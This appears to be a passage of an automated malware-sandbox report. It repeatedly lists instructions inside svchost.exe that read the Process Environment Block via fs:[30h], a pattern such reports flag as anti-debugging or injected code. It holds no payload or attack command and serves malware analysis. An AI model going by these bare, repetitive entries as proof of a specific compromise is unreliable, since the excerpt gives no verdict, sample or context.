Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h] 2_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h] 2_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h] 2_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h] 2_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h] 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h] 2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h] 2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h] 2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h] 2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h] 2_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h] 2_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h] 2_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h] 2_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h] 2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h] 2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h] 2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h] 2_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h] 2_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h] 2_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h] 2_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h] 2_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h] 2_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h] 2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h] 2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h] 2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h] 2_2_03C30750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h] 2_2_03CBE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h] 2_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h] 2_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h] 2_2_03CB4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h] 2_2_03C38770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h] 2_2_03C6C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h] 2_2_03C30710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h] 2_2_03C60710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h] 2_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h] 2_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h] 2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h] 2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h] 2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h] 2_2_03CAC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h] 2_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h] 2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h] 2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h] 2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h] 2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h] 2_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h] 2_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h] 2_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h] 2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h] 2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h] 2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h] 2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h] 2_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h] 2_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] 2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h] 2_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h] 2_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h] 2_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h] 2_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h] 2_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h] 2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h] 2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h] 2_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h] 2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h] 2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h] 2_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h] 2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h] 2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h] 2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h] 2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h] 2_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h] 2_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h] 2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h] 2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h] 2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h] 2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h] 2_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h] 2_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h] 2_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h] 2_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h] 2_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h] 2_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h] 2_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h] 2_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h] 2_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h] 2_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h] 2_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h] 2_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h] 2_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h] 2_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h] 2_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] 2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] 2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] 2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] 2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] 2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] 2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h] 2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h] 2_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h] 2_2_03C28B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h] 2_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h] 2_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h] 2_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] 2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] 2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] 2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] 2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] 2_2_03C86ACC
